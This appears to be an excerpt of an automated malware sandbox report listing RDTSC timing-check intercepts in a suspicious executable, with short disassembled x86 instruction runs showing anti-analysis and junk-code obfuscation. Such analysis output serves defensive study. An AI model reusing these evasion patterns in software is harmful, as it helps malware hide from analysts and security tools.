                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D98322 second address: D9832C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2A2C61915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D98413 second address: D98434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F2A2CEBE364h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D98434 second address: D9843A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D9843A second address: D9845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jg 00007F2A2CEBE356h 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f pushad 0x00000010 sub bh, 0000003Dh 0x00000013 mov ax, E711h 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 230A7F74h 0x0000001f pushad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D9845D second address: D984AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a xor dword ptr [esp], 230A7FF4h 0x00000011 mov dx, 624Dh 0x00000015 push 00000003h 0x00000017 jbe 00007F2A2C61916Ch 0x0000001d jmp 00007F2A2C619166h 0x00000022 mov ecx, dword ptr [ebp+122D2543h] 0x00000028 push 00000000h 0x0000002a mov edi, 462E40C6h 0x0000002f push 00000003h 0x00000031 mov edi, dword ptr [ebp+122D2C07h] 0x00000037 push 62439CF3h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D984AF second address: D984B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D984B3 second address: D984B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D984B7 second address: D984C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D984C0 second address: D984F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2A2C619156h 0x0000000a popad 0x0000000b popad 0x0000000c add dword ptr [esp], 5DBC630Dh 0x00000013 cld 0x00000014 lea ebx, dword ptr [ebp+12453F5Ch] 0x0000001a sub dword ptr [ebp+122D1FB9h], ebx 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 jmp 00007F2A2C619160h 0x00000029 pop ebx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DA98BA second address: DA98CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F2A2CEBE358h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB9450 second address: DB9471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2A2C619168h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB9471 second address: DB9475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB9475 second address: DB9479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72B3 second address: DB72D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a popad 0x0000000b jmp 00007F2A2CEBE365h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72D3 second address: DB72DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72DB second address: DB72F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE361h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72F0 second address: DB72FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72FA second address: DB72FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72FE second address: DB7302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB75BD second address: DB75F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Bh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c jg 00007F2A2CEBE356h 0x00000012 pop ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jno 00007F2A2CEBE356h 0x0000001c jmp 00007F2A2CEBE362h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB75F6 second address: DB75FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB774B second address: DB775C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A2CEBE35Ch 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB7B67 second address: DB7B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB7B6B second address: DB7B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB7B71 second address: DB7B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2A2C619169h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB7E86 second address: DB7E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8125 second address: DB8142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F2A2C619156h 0x0000000f jmp 00007F2A2C61915Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8142 second address: DB8146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8146 second address: DB815F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A2C61915Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB815F second address: DB8188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE367h 0x00000007 jmp 00007F2A2CEBE35Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8188 second address: DB8198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007F2A2C619156h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8198 second address: DB819C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB819C second address: DB81A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8595 second address: DB85A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Ch 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB85A6 second address: DB85C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A2C61915Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f jnp 00007F2A2C619156h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8D6A second address: DB8D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8D77 second address: DB8D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A2C619164h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8ECD second address: DB8F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2A2CEBE364h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 jmp 00007F2A2CEBE367h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB9335 second address: DB933F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A2C619156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB933F second address: DB9343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DBEB2E second address: DBEB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F2A2C61915Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DBF2F7 second address: DBF2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC0537 second address: DC053D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC053D second address: DC0542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4D90 second address: DC4D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4D94 second address: DC4DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4DA0 second address: DC4DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4DA4 second address: DC4DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4DB4 second address: DC4DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D86359 second address: D8635E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D8635E second address: D86376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2A2C619163h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC41E9 second address: DC41ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC41ED second address: DC41F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A2C619156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4607 second address: DC460D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC460D second address: DC4612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC48EA second address: DC490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE367h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC490A second address: DC4910 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4910 second address: DC4929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A2CEBE360h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6D81 second address: DC6DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007F2A2C619156h 0x00000011 popad 0x00000012 pop edx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F2A2C61915Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6F6B second address: DC6F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6F71 second address: DC6F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2C61915Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC7C24 second address: DC7C2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC80C3 second address: DC80C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC865A second address: DC865E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCA86C second address: DCA870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCA870 second address: DCA87E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F2A2CEBE356h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCB5E4 second address: DCB5EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCC104 second address: DCC18B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2A2CEBE369h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 sub dword ptr [ebp+122D1854h], esi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F2A2CEBE358h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 push 00000000h 0x00000036 jmp 00007F2A2CEBE367h 0x0000003b call 00007F2A2CEBE35Eh 0x00000040 mov di, si 0x00000043 pop edi 0x00000044 xchg eax, ebx 0x00000045 pushad 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEABD second address: DCEAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEAC4 second address: DCEACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2A2CEBE356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEACE second address: DCEAEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A2C619166h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEAEF second address: DCEAF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEAF4 second address: DCEB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jnc 00007F2A2C61915Ch 0x0000000e mov dword ptr [ebp+122D1C18h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F2A2C619158h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 pushad 0x00000031 or dl, FFFFFFC6h 0x00000034 cmc 0x00000035 popad 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F2A2C619158h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2EFCh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c pushad 0x0000005d popad 0x0000005e pop esi 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD08A2 second address: DD08C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A2CEBE367h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD08C4 second address: DD08C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD08C8 second address: DD08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD08CE second address: DD08D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD18DB second address: DD1958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2A2CEBE35Ah 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F2A2CEBE358h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a stc 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D1B21h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F2A2CEBE358h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov ebx, 52F1B762h 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 jbe 00007F2A2CEBE356h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD0AB4 second address: DD0AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD37B8 second address: DD37BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD57F3 second address: DD57F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD57F7 second address: DD57FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD494F second address: DD4954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD57FB second address: DD5835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F2A2CEBE358h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F2A2CEBE365h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2A2CEBE362h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD4954 second address: DD495A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD6894 second address: DD689A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
